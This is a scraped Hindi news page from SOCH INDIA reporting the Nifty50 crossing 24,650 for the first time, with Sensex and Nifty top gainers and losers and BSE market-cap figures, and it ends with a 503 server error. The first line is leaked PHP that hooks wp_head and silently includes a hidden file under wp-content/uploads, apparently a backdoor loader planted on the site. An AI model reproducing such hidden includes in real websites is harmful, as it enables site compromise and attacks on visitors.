add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Nifty New Record: नए शिखर पर बाजार, निफ्टी पहली बार 24650 के पार, मिडकैप इंडेक्स में भी रिकॉर्ड ऊंचाई – SOCH INDIA
Menu

देश
Nifty New Record: नए शिखर पर बाजार, निफ्टी पहली बार 24650 के पार, मिडकैप इंडेक्स में भी रिकॉर्ड ऊंचाई

nobanner

भारतीय शेयर बाजार की शुरुआत हल्की तेजी के साथ हुई और बाजार खुलने के तुरंत बाद निफ्टी ने नया शिखर छू लिया. निफ्टी50 ने पहली बार 24,650 का लेवल पार किया और नया हाई 24,650.05 का बनाया है. मिडकैप इंडेक्स भी रिकॉर्ड ऊंचाई पर आ गया है. आईटी शेयरों की बढ़त बरकरार है और टीसीएस, इंफोसिस के शेयरों में मजबूती बनी हुई है. इंडिया VIX इस समय लगभग सपाट है और स्मॉलकैप इंडेक्स थोड़ा सुस्त है.

कैसी रही बाजार की शुरुआत
बीएसई का सेंसेक्स 66.63 अंक की मामूली तेजी के साथ 80,731 पर खुला है जबकि एनएसई का निफ्टी 29.20 अंक या 0.12 फीसदी की बढ़त के बाद 24,615 के स्तर पर ओपन हुआ है.

सेंसेक्स के चढ़ने-गिरने वाले शेयर
सेंसेक्स के 30 में से 20 शेयरों में तेजी देखी जा रही है और 10 शेयरों में गिरावट बनी हुई है. भारती एयरटेल टॉप गेनर है और 2 फीसदी चढ़ा है. कोल इंडिया 1.69 फीसदी, बीपीसीएल 1.58 फीसदी, इंफोसिस 1.04 फीसदी और एचयूएल 1.03 फीसदी ऊपर हैं. गिरने वाले शेयरों में कोटक महिंद्रा बैंक 0.98 फीसदी, एसबीआई लाइफ 0.87 फीसदी, एलएंडटी 0.78 फीसदी, एनटीपीसी 0.66 फीसदी, बजाज फाइनेंस 0.65 फीसदी और रिलायंस इंडस्ट्रीज 0.63 फीसदी नीचे ट्रेड कर रहे हैं.

निफ्टी के टॉप गेनर्स-लूजर्स
निफ्टी के 50 में से 30 शेयरों में तेजी देखी जा रही है और 20 शेयरों में गिरावट बनी हुई है. भारती एयरटेल यहां भी टॉप गेनर बनकर 1.98 फीसदी चढ़ा है. कोल इंडिया 1.93 फीसदी, बीपीसीएल 1.54 फीसदी, इंफोसिस 1.45 फीसदी और ओएनजीसी 1.18 फीसदी ऊपर हैं. निफ्टी के गिरने वाले शेयरों में श्रीराम फाइनेंस 1.52 फीसदी टूटा है और टॉप लूजर है. इसके बाद एसबीआई लाइफ 1.07 फीसदी, कोटक महिंद्रा बैंक 1.03 फीसदी, एलएंडटी 0.73 फीसदी और रिलायंस इंडस्ट्रीज 0.65 फीसदी गिरकर कारोबार कर रहे हैं.

BSE का मार्केट कैपिटलाइजेशन
बीएसई का का मार्केट कैपिटलाइजेशन 456.68 लाख करोड़ रुपये पर आ गया है और अमेरिकी डॉलर में 5.46 ट्रिलियनन डॉलर पर है. 3186 शेयरों पर बीएसई में ट्रेड देखा जा रहा है जिसमें से 2167 शेयरों में बढ़त है. 911 शेयर नीचे हैं और 108 शेयर बिना बदलाव के ट्रेड कर रहे हैं. 116 शेयरों पर अपर सर्किट लगा है और 67 शेयरों पर लोअर सर्किट लगा है. 146 शेयर 52 हफ्तों की ऊंचाई पर और 10 शेयर इतने ही टाइम की गिरावट पर हैं.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.